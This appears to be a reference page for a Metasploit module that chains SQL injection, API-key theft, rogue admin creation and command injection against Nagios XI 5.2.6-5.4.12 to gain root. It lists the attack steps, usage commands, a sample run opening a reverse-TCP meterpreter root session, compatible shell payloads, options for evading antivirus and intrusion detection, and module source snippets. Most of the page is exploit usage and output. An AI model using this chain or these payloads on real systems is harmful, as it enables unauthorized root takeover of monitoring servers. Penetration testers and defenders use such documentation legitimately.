Nagios XI Chained Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Nagios XI Chained Remote Code Execution
Module: exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
Source code: modules/exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.rb
Disclosure date: 2018-04-17
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x86
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2018-8733, CVE-2018-8734, CVE-2018-8735, CVE-2018-8736

This module exploits a few different vulnerabilities in Nagios XI 5.2.6-5.4.12 to gain remote root access. The steps are: 1. Issue a POST request to /nagiosql/admin/settings.php which sets the database user to root. 2. SQLi on /nagiosql/admin/helpedit.php allows us to enumerate API keys. 3. The API keys are then used to add an administrative user. 4. An authenticated session is established with the newly added user 5. Command Injection on /nagiosxi/backend/index.php allows us to execute the payload with nopasswd sudo, giving us a root shell. 6. Remove the added admin user and reset the database user.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
msf exploit(nagios_xi_chained_rce_2_electric_boogaloo) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Nagios XI 5.2.6 - 5.4.12 Chained Remote Root RCE

This exploit combines many different vulnerabilities in Nagios XI to gain remote root access to the affected host. The process is:

  1. Reset the database user to root.
  2. Exploit SQL injection to extract api keys.
  3. Use api key to add administrative user.
  4. Authenticate to application using newly added user.
  5. Exploit command injection and sudo misconfiguration to get remote root shell.
  6. Remove added admin user, and reset database user.

See our blog post for more information

Verification Steps


  1. use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
  2. set rhost <IP>
  3. exploit
  4. A meterpreter session should have been opened successfully

Scenarios


Nagios 5.2.7 on CentOS 6.7

msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182
rhost => 172.22.222.182
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run

[*] Started reverse TCP handler on 172.22.222.177:4444
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Sending stage (857352 bytes) to 172.22.222.182
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.182:35262) at 2018-06-29 11:04:03 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the linux/http/nagios_xi_chained_rce_2_electric_boogaloo exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo

[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > show info

       Name: Nagios XI Chained Remote Code Execution
     Module: exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
   Platform: Linux
       Arch: x86
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2018-04-17

Provided by:
  Cale Smith
  Benny Husted
  Jared Arave

Available targets:
  Id  Name
  --  ----
  0   Nagios XI 5.2.6 <= 5.4.12

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  This module exploits a few different vulnerabilities in Nagios XI 
  5.2.6-5.4.12 to gain remote root access. The steps are: 1. Issue a 
  POST request to /nagiosql/admin/settings.php which sets the database 
  user to root. 2. SQLi on /nagiosql/admin/helpedit.php allows us to 
  enumerate API keys. 3. The API keys are then used to add an 
  administrative user. 4. An authenticated session is established with 
  the newly added user 5. Command Injection on 
  /nagiosxi/backend/index.php allows us to execute the payload with 
  nopasswd sudo, giving us a root shell. 6. Remove the added admin 
  user and reset the database user.

References:
  https://www.exploit-db.com/exploits/44560
  https://nvd.nist.gov/vuln/detail/CVE-2018-8733
  https://nvd.nist.gov/vuln/detail/CVE-2018-8734
  https://nvd.nist.gov/vuln/detail/CVE-2018-8735
  https://nvd.nist.gov/vuln/detail/CVE-2018-8736
  http://blog.redactedsec.net/exploits/2018/04/26/nagios.html

Module Options


This is a complete list of options available in the linux/http/nagios_xi_chained_rce_2_electric_boogaloo exploit:

msf6 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > show options

Module options (exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nagios XI 5.2.6 <= 5.4.12

Advanced Options


Here is a complete list of advanced options supported by the linux/http/nagios_xi_chained_rce_2_electric_boogaloo exploit:

msf6 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > show advanced

Module advanced options (exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, printf)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                30                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/nagios_xi_chained_rce_2_electric_boogaloo module can exploit:

msf6 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Nagios XI 5.2.6 <= 5.4.12

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/nagios_xi_chained_rce_2_electric_boogaloo exploit:

msf6 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x86/adduser                                          normal  No     Linux Add User
   6   payload/linux/x86/chmod                                            normal  No     Linux Chmod
   7   payload/linux/x86/exec                                             normal  No     Linux Execute Command
   8   payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   9   payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   10  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   11  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   12  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   13  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   14  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   15  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   16  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   17  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   18  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   19  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   20  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   21  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   22  payload/linux/x86/read_file                                        normal  No     Linux Read File
   23  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   24  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   26  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   27  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   28  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   29  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   30  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   31  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   32  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   33  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   34  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   35  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   36  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/nagios_xi_chained_rce_2_electric_boogaloo exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not check nagios version


Here is a relevant code snippet related to the "Could not check nagios version" error message:

69:	      'method' => 'GET',
70:	      'uri'    => '/nagiosxi/'
71:	    })
72:	
73:	    if !res || !res.get_html_document
74:	      fail_with(Failure::Unknown, 'Could not check nagios version')
75:	    end
76:	
77:	    if (@version = res.get_html_document.at('//input[@name = "version"]/@value').text)
78:	      @version = Rex::Version.new(@version)
79:	      vprint_good("STEP 0: Found Nagios XI version: #{@version.to_s}")

Try nagios_xi_chained for this version.


Here is a relevant code snippet related to the "Try nagios_xi_chained for this version." error message:

76:	
77:	    if (@version = res.get_html_document.at('//input[@name = "version"]/@value').text)
78:	      @version = Rex::Version.new(@version)
79:	      vprint_good("STEP 0: Found Nagios XI version: #{@version.to_s}")
80:	      if @version < target[:lower_version]
81:	        vprint_bad('Try nagios_xi_chained for this version.')
82:	      elsif (@version <= target[:upper_version] && @version >= target[:lower_version])
83:	        return CheckCode::Appears
84:	      end
85:	    end
86:	    CheckCode::Safe

STEP <STEP>: Unexpected response setting db user to root


Here is a relevant code snippet related to the "STEP <STEP>: Unexpected response setting db user to root" error message:

111:	        'selSeldisable'=>1
112:	      }
113:	    })
114:	
115:	    if !res || res.code != 302
116:	      fail_with(Failure::UnexpectedReply,"STEP #{step}: Unexpected response setting db user to root")
117:	    end
118:	    vprint_status "STEP #{step}: Received a 302 Response. That's good!"
119:	  end
120:	
121:	  def get_api_keys

STEP 2: Unexpected response extracting api keys


Here is a relevant code snippet related to the "STEP 2: Unexpected response extracting api keys" error message:

139:	        'modus'=>0
140:	      }
141:	    })
142:	
143:	    if !res || res.code != 302 || !res.body
144:	      fail_with(Failure::UnexpectedReply,'STEP 2: Unexpected response extracting api keys')
145:	    end
146:	
147:	    vprint_status 'STEP 2: Received a 302 Response. That\'s good!'
148:	    parse_api_key(res.body)
149:	  end

Could not parse api keys


Here is a relevant code snippet related to the "Could not parse api keys" error message:

159:	        api_keys << key
160:	      end
161:	    end
162:	
163:	    if api_keys.length < 1
164:	      fail_with(Failure::Unknown, 'Could not parse api keys')
165:	    end
166:	
167:	    vprint_status "Found #{api_keys.length.to_s} unique api keys"
168:	    api_keys.each do |key|
169:	      vprint_status key

STEP 3: Failed to add a user.


Here is a relevant code snippet related to the "STEP 3: Failed to add a user." error message:

180:	      if (user_id.to_i > 0)
181:	        vprint_good "Added user:#{username} password:#{password} userid:#{user_id}"
182:	        return user_id.to_s, key
183:	      end
184:	    end
185:	    fail_with(Failure::Unknown, 'STEP 3: Failed to add a user.')
186:	  end
187:	
188:	  def try_add_admin(key, username, passwd)
189:	    vprint_status "STEP 3: trying to add admin user with key #{key}"
190:	    res = send_request_cgi({

STEP 4.1: Could not get nsp string for login


Here is a relevant code snippet related to the "STEP 4.1: Could not get nsp string for login" error message:

231:	      'method' => 'POST',
232:	      'ctype' => 'application/x-www-form-urlencoded'
233:	    })
234:	
235:	    if !res || !res.body
236:	      fail_with(Failure::Unknown, 'STEP 4.1: Could not get nsp string for login')
237:	    end
238:	
239:	    login_nsp = parse_nsp_str(res.body)
240:	    vprint_status "STEP 4.1: login_nsp #{login_nsp} "
241:	

STEP 4.2 Could not get authed nsp string.


Here is a relevant code snippet related to the "STEP 4.2 Could not get authed nsp string." error message:

258:	        'loginButton' => ''
259:	      }
260:	    })
261:	
262:	    if !res || res.code != 302
263:	      fail_with(Failure::Unknown, 'STEP 4.2 Could not get authed nsp string.')
264:	    end
265:	
266:	    authed_nagiosxi = parse_nagiosxi(res)
267:	    vprint_status "STEP 4.2: authed_nagiosxi #{authed_nagiosxi}"
268:	    authed_nagiosxi

Could not find nsp_str


Here is a relevant code snippet related to the "Could not find nsp_str" error message:

270:	
271:	  def parse_nsp_str(resp_body)
272:	    nsp_strs = /var nsp_str = "(.+)";\n/.match(resp_body)
273:	
274:	    unless nsp_strs || nsp_strs.length < 2
275:	      fail_with(Failure::NotFound, 'Could not find nsp_str')
276:	    end
277:	
278:	    nsp_strs[1]
279:	  end
280:	

Here is a relevant code snippet related to the "Could not find nagiosxi cookie" error message:

281:	  def parse_nagiosxi(res)
282:	    cookie = res.get_cookies
283:	    matches = /.*nagiosxi=(.+);/.match(cookie)
284:	
285:	    unless matches || matches.length < 2
286:	      fail_with(Failure::NotFound, 'Could not find nagiosxi cookie')
287:	    end
288:	
289:	    matches[1]
290:	  end
291:	

STEP 5.1: Command execution failed


Here is a relevant code snippet related to the "STEP 5.1: Command execution failed" error message:

321:	
322:	    vprint_status 'STEP 5.1: executing payload'
323:	    res = send_request_cgi(opts_exec)
324:	
325:	    if !res || res.code != 200
326:	      fail_with(Failure::Unknown, 'STEP 5.1: Command execution failed')
327:	    end
328:	
329:	    vprint_status 'STEP 5.2: removing scripts from disc'
330:	    res = send_request_cgi(opts_cleanup)
331:	

STEP 5.2: Command cleanup failed


Here is a relevant code snippet related to the "STEP 5.2: Command cleanup failed" error message:

328:	
329:	    vprint_status 'STEP 5.2: removing scripts from disc'
330:	    res = send_request_cgi(opts_cleanup)
331:	
332:	    if !res || res.code != 200
333:	      fail_with(Failure::Unknown, 'STEP 5.2: Command cleanup failed')
334:	    end
335:	  end
336:	
337:	  def exploit
338:	    if check != CheckCode::Appears

STEP 0: Vulnerable version not found! punt!


Here is a relevant code snippet related to the "STEP 0: Vulnerable version not found! punt!" error message:

334:	    end
335:	  end
336:	
337:	  def exploit
338:	    if check != CheckCode::Appears
339:	      fail_with(Failure::NotVulnerable, 'STEP 0: Vulnerable version not found! punt!')
340:	    end
341:	
342:	    set_db_user('root', 'nagiosxi')
343:	
344:	    keys = get_api_keys

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Cale Smith
  • Benny Husted
  • Jared Arave

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.